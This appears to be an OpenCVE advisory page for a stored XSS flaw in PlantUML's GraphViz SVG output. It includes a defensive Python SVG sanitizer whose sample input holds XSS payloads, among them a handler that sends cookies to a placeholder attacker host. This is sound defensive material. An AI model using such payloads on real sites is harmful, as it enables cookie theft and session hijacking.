Description
Versions of the package net.sourceforge.plantuml:plantuml before 1.2026.0 are vulnerable to Stored XSS due to insufficient sanitization of interactive attributes in GraphViz diagrams. As a result, a crafted PlantUML diagram can inject malicious JavaScript into generated SVG output, leading to arbitrary script execution in the context of applications that render the SVG.
Published: 2026-01-16
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Script execution via stored XSS
Action: Patch
AI Analysis

Impact

The vulnerability is a stored cross-site scripting flaw that originates from insufficient sanitization of interactive attributes (the hyperlink and tooltip attributes that GraphViz carries into its SVG output) in GraphViz-backed diagrams produced by PlantUML. A maliciously crafted diagram can inject JavaScript into the resulting SVG; when that SVG is rendered inline or opened as a document, the script runs in the origin of the application that serves it, with access to that application's cookies, DOM and same-origin APIs. SVG loaded through an <img> element or a CSS background is rendered with scripting disabled, so actual exposure depends on how the application embeds the output. This is an improper-neutralization (injection) weakness, classified as CWE-79.

Affected Systems

PlantUML (net.sourceforge.plantuml:plantuml) versions older than 1.2026.0 are affected. Any application that embeds one of these versions, accepts diagram source from users, and renders the GraphViz-backed diagram types to SVG is exposed; the risk is highest where the generated SVG is stored and later shown inline to other users (for example, a wiki or documentation portal with a diagram plugin).

Risk and Exploitability

The CVSS v4.0 base score of 5.1 (the v3.1 base score recorded on the CVE is 6.1) indicates moderate risk; the EPSS score of less than 1% shows a very low predicted probability of exploitation, and the issue is not listed in the CISA KEV catalog. Exploitation requires that an attacker supply a PlantUML diagram that the application stores and later renders as SVG, and that a victim then view the rendered diagram (both vectors carry a user-interaction requirement, UI:R and UI:A). The injected script runs in the origin of the rendering application and in the victim's session, enabling cookie or token theft, session hijacking, or actions taken as the victim. Anyone able to submit diagram source to the vulnerable application is a potential threat actor; the vector requires no privileges (PR:N), although the application itself may restrict who can create diagrams.

Generated by OpenCVE AI on April 18, 2026 at 05:50 UTC.

Remediation

No separate vendor advisory or workaround is recorded on this page. The affected range (versions before 1.2026.0) indicates that release 1.2026.0 contains the fix; see the recommended actions below.

OpenCVE Recommended Actions

  • Upgrade to PlantUML 1.2026.0 or later, the first release outside the affected range, which removes the insecure handling of interactive GraphViz attributes.
  • If upgrading is delayed, post-process every generated SVG before it is served: remove <script> and <foreignObject> elements, strip on* event-handler attributes, and drop link targets whose scheme is not http, https or mailto (javascript: and data: in particular). Do not accept diagram source from untrusted users while the vulnerable version is in place.
  • Where interactive links are not needed, embed the output through an <img> element or a CSS background rather than inline, since browsers render SVG-as-image with scripting disabled. Log sanitizer hits and rejected diagrams so that abuse is visible, and disable diagram import if it is not essential to operations.
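A server-side filter of the kind the second action describes, added here as an illustration: it is not PlantUML's or OpenCVE's code, and it does not assert which specific GraphViz attribute the fixed release changed. It parses the generated SVG, removes script-capable elements, on* event handlers and javascript:/data: link targets, and returns a list of findings that can be logged for the monitoring step. The sample SVG inside it is constructed to resemble diagram output rather than captured from PlantUML, and the attacker.invalid and example.com hosts are placeholders.

```python
"""Strip script-bearing content from generated SVG before it is served.

Added illustration for this advisory, not PlantUML's own code. UNTRUSTED_SVG
is a constructed sample that shows what a node could turn into if an attacker
controlled its interactive attributes: an <a> with a javascript: target, an
inline event handler, and a <script> element. It is not real PlantUML output.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # keep the default namespace on output
ET.register_namespace("xlink", XLINK_NS)

# Elements that execute script or smuggle arbitrary HTML into an SVG document.
DANGEROUS_TAGS = {"script", "foreignObject", "iframe", "object", "embed", "handler"}
# Attributes whose value is a URL and therefore a "javascript:" sink.
# ElementTree reports xlink:href as "{xlink-ns}href", so the local name is "href".
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}


def _local(name: str) -> str:
    """Return the local part of an ElementTree '{namespace}name' string."""
    return name.rsplit("}", 1)[-1]


def is_safe_url(value: str) -> bool:
    """Allow relative links, fragments and a short allowlist of schemes.

    Browsers ignore whitespace and control characters inside a scheme, so
    "java\\tscript:" must be normalised before the check, not compared raw.
    """
    cleaned = re.sub(r"[\x00-\x20]", "", value).lower()
    scheme = re.match(r"^([a-z][a-z0-9+.-]*):", cleaned)
    if scheme is None:            # "#node1", "docs/index.html", "/path"
        return True
    return scheme.group(1) in SAFE_SCHEMES


def _scrub(elem: ET.Element, findings: list) -> None:
    """Recursively drop dangerous children, on* handlers and unsafe URLs."""
    for child in list(elem):
        tag = _local(child.tag)
        if tag in DANGEROUS_TAGS:
            findings.append(f"removed <{tag}> element")
            elem.remove(child)
            continue
        _scrub(child, findings)
    for attr in list(elem.attrib):
        name = _local(attr)
        value = elem.attrib[attr]
        if name.lower().startswith("on"):
            findings.append(f"removed {name} handler on <{_local(elem.tag)}>")
            del elem.attrib[attr]
        elif name in URL_ATTRS and not is_safe_url(value):
            findings.append(f"removed unsafe {name}={value!r} on <{_local(elem.tag)}>")
            del elem.attrib[attr]


def sanitize_svg(svg_text: str) -> tuple:
    """Return (sanitized SVG text, list of findings worth logging)."""
    # A DOCTYPE has no business in generated SVG and is the entry point for
    # entity-expansion tricks, so refuse the document outright.
    if re.search(r"<!DOCTYPE", svg_text, re.IGNORECASE):
        raise ValueError("DOCTYPE not allowed in SVG input")
    root = ET.fromstring(svg_text)
    findings = []
    _scrub(root, findings)
    return ET.tostring(root, encoding="unicode"), findings


# Constructed sample, not real PlantUML output (hosts are placeholders).
UNTRUSTED_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="220" height="100">
  <g id="node1" class="node">
    <a xlink:href="javascript:alert(document.cookie)">
      <ellipse cx="55" cy="50" rx="45" ry="20" fill="none" stroke="black"/>
      <text x="55" y="55" onmouseover="fetch('https://attacker.invalid/?c='+document.cookie)">Login</text>
    </a>
  </g>
  <a xlink:href="https://example.com/docs"><text x="160" y="55">Docs</text></a>
  <script>alert(1)</script>
</svg>"""

if __name__ == "__main__":
    cleaned, findings = sanitize_svg(UNTRUSTED_SVG)
    for line in findings:
        print("sanitizer:", line)     # feed these into logging/alerting
    print(cleaned)
```

Run it on every SVG before it leaves the server and ship the findings to your logs; a burst of removed javascript: targets from one account is a far more reliable signal than trying to spot script execution after the fact. Where link interactivity is not needed at all, serving the diagram through <img> is the cheaper control, because the browser will not execute script in that context regardless of what the SVG contains.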



Advisories

Source: GitHub GHSA
ID: GHSA-hrvf-g648-rf3m
Title: PlantUML is vulnerable to Stored XSS due to insufficient sanitization of interactive attributes in GraphViz diagrams
History

Mon, 02 Feb 2026 19:00:00 +0000

Type: CPEs
Values added: cpe:2.3:a:plantuml:plantuml:*:*:*:*:*:*:*:*

Fri, 16 Jan 2026 14:15:00 +0000

Type: First Time appeared
Values added: Plantuml; Plantuml plantuml

Type: Vendors & Products
Values added: Plantuml; Plantuml plantuml

Type: Metrics
Values added: ssvc
{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 16 Jan 2026 12:15:00 +0000

Type: Title
Values added: plantuml: PlantUML: Arbitrary script execution via Stored Cross-Site Scripting in GraphViz diagrams

Type: References

Type: Metrics
threat_severity removed: None
threat_severity added: Moderate


Fri, 16 Jan 2026 05:15:00 +0000

Type: Description
Values added: Versions of the package net.sourceforge.plantuml:plantuml before 1.2026.0 are vulnerable to Stored XSS due to insufficient sanitization of interactive attributes in GraphViz diagrams. As a result, a crafted PlantUML diagram can inject malicious JavaScript into generated SVG output, leading to arbitrary script execution in the context of applications that render the SVG.

Type: Weaknesses
Values added: CWE-79

Type: References

Type: Metrics
cvssV3_1 added: {'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P'}
cvssV4_0 added: {'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N/E:P'}


MITRE

Status: PUBLISHED

Assigner: snyk

Published:

Updated: 2026-01-16T14:10:00.485Z

Reserved: 2026-01-12T09:57:41.760Z

Link: CVE-2026-0858

Vulnrichment

Updated: 2026-01-16T14:09:56.891Z

NVD

Status : Analyzed

Published: 2026-01-16T05:16:16.117

Modified: 2026-02-02T18:52:02.240

Link: CVE-2026-0858

Red Hat

Severity : Moderate

Public Date: 2026-01-16T05:00:06Z

Links: CVE-2026-0858 - Bugzilla

OpenCVE Enrichment

Updated: 2026-04-18T06:00:08Z

Weaknesses